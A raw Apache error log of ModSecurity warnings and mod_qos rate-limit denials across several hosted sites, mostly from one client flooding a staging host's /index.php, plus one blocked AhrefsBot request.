[Tue May 26 19:59:19.300890 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs4wAAACg"]
[Tue May 26 19:59:19.301380 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253OgAAAfA"]
[Tue May 26 19:59:19.310490 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs8QAAAGo"]
[Tue May 26 19:59:19.314819 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253aAAAAfE"]
[Tue May 26 19:59:19.315298 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253XgAAAeg"]
[Tue May 26 19:59:19.316443 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253awAAAgU"]
[Tue May 26 19:59:19.320815 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs8gAAAHU"]
[Tue May 26 19:59:19.333705 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253WgAAAbQ"]
[Tue May 26 19:59:19.340273 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253PAAAAa4"]
[Tue May 26 19:59:19.343983 2026] [security2:error] [pid 93868:tid 94365] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253WQAAAfo"]
[Tue May 26 19:59:19.346067 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs3gAAACI"]
[Tue May 26 19:59:19.347022 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253NgAAAZI"]
[Tue May 26 19:59:19.363286 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs9wAAAE0"]
[Tue May 26 19:59:19.366391 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253UQAAAeE"]
[Tue May 26 19:59:19.368986 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs1gAAAB0"]
[Tue May 26 19:59:19.373253 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253bQAAAcE"]
[Tue May 26 19:59:19.377846 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253ZAAAAfU"]
[Tue May 26 19:59:19.385914 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253cgAAAbw"]
[Tue May 26 19:59:19.392304 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253fAAAAaU"]
[Tue May 26 19:59:19.395851 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253cQAAAds"]
[Tue May 26 19:59:19.448926 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2533gAAAaI"]
[Tue May 26 19:59:19.450461 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2531QAAAdg"]
[Tue May 26 19:59:19.456838 2026] [security2:error] [pid 93576:tid 93803] [client 45.92.1.17:59021] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWuP2DRMqfxdEDkosztnAAAAFs"], referer: www.google.com
[Tue May 26 19:59:19.552042 2026] [security2:error] [pid 93576:tid 93714] [client 45.92.1.17:58674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWuP2DRMqfxdEDkosztoQAAAAI"], referer: www.google.com
[Tue May 26 19:59:19.644279 2026] [security2:error] [pid 93576:tid 93836] [client 54.39.0.248:55484] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rakeshdewan.com"] [uri "/"] [unique_id "ahWuP2DRMqfxdEDkosztpwAAAHw"]
[Tue May 26 19:59:19.644377 2026] [security2:error] [pid 93576:tid 93836] [client 54.39.0.248:55484] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rakeshdewan.com"] [uri "/"] [unique_id "ahWuP2DRMqfxdEDkosztpwAAAHw"]
[Tue May 26 19:59:19.835843 2026] [security2:error] [pid 93868:tid 94375] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254JAAAAgQ"]
[Tue May 26 19:59:20.019138 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254WwAAAdg
[Tue May 26 19:59:20.019230 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254XwAAAa8
[Tue May 26 19:59:20.019505 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254XQAAAeI
[Tue May 26 19:59:20.024382 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254ZgAAAdU
[Tue May 26 19:59:20.024556 2026] [qos:error] [pid 93868:tid 94267] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254ZwAAAZg
[Tue May 26 19:59:20.025029 2026] [qos:error] [pid 93868:tid 94365] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254aAAAAfo
[Tue May 26 19:59:20.025364 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt3AAAAHs
[Tue May 26 19:59:20.027831 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254awAAAdc
[Tue May 26 19:59:20.027929 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt3gAAAEM
[Tue May 26 19:59:20.033831 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254bgAAAfI
[Tue May 26 19:59:20.170438 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt5AAAAFc
[Tue May 26 19:59:20.171148 2026] [qos:error] [pid 93868:tid 94278] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254cQAAAaM
[Tue May 26 19:59:20.174049 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt5gAAAAM
[Tue May 26 19:59:20.174496 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254cgAAAa8
[Tue May 26 19:59:20.175737 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt5wAAAF8
[Tue May 26 19:59:20.177139 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254cwAAAdw
[Tue May 26 19:59:20.177759 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt6AAAACI
[Tue May 26 19:59:20.182527 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt6gAAADI
[Tue May 26 19:59:20.182757 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt6QAAAFE
[Tue May 26 19:59:20.188252 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszt6wAAAFo
[Tue May 26 19:59:20.278637 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253eQAAAeU"]
[Tue May 26 19:59:20.283321 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2531wAAAe0"]
[Tue May 26 19:59:20.287464 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253dAAAAeY"]
[Tue May 26 19:59:20.295976 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2531gAAAZQ"]
[Tue May 26 19:59:20.298095 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztXQAAAEg"]
[Tue May 26 19:59:20.328438 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztbAAAAEE"]
[Tue May 26 19:59:20.332034 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztdAAAAGk"]
[Tue May 26 19:59:20.344584 2026] [qos:error] [pid 93868:tid 94382] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254ggAAAgs
[Tue May 26 19:59:20.348814 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszt_AAAADI
[Tue May 26 19:59:20.350689 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztcQAAAAA"]
[Tue May 26 19:59:20.356801 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztWgAAAHc"]
[Tue May 26 19:59:20.358919 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztcgAAAD0"]
[Tue May 26 19:59:20.365114 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztdwAAAAc"]
[Tue May 26 19:59:20.367789 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkoszteAAAAGs"]
[Tue May 26 19:59:20.370932 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztdgAAAH4"]
[Tue May 26 19:59:20.375778 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztbwAAAGw"]
[Tue May 26 19:59:20.380735 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkoszteQAAAD4"]
[Tue May 26 19:59:20.394301 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztfwAAAGY"]
[Tue May 26 19:59:20.397810 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztcAAAABk"]
[Tue May 26 19:59:20.409228 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztegAAADg"]
[Tue May 26 19:59:20.446019 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkoszthAAAAC4"]
[Tue May 26 19:59:20.615106 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszuGAAAADg
[Tue May 26 19:59:20.615167 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszuGgAAABM
[Tue May 26 19:59:20.615295 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszuHgAAACM
[Tue May 26 19:59:20.615961 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszuGQAAAEE
[Tue May 26 19:59:20.619193 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszuHwAAABY
[Tue May 26 19:59:20.620678 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszuJAAAAE8
[Tue May 26 19:59:20.621265 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszuJgAAAAk
[Tue May 26 19:59:20.626310 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszuLQAAAAQ
[Tue May 26 19:59:20.629612 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQGDRMqfxdEDkoszuLwAAAAA
[Tue May 26 19:59:20.630828 2026] [qos:error] [pid 93868:tid 94318] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQEqK9k_ZUB2Vp254mAAAAcs
[Tue May 26 19:59:20.882220 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszuPAAAABY
[Tue May 26 19:59:20.884156 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszuPgAAAAs
[Tue May 26 19:59:20.884725 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszuPQAAACk
[Tue May 26 19:59:20.886336 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQGDRMqfxdEDkoszuPwAAAFM
[Tue May 26 19:59:20.890468 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254oAAAAZw
[Tue May 26 19:59:20.892686 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254oQAAAZM
[Tue May 26 19:59:20.895260 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254ogAAAaE
[Tue May 26 19:59:20.897011 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254pAAAAeg
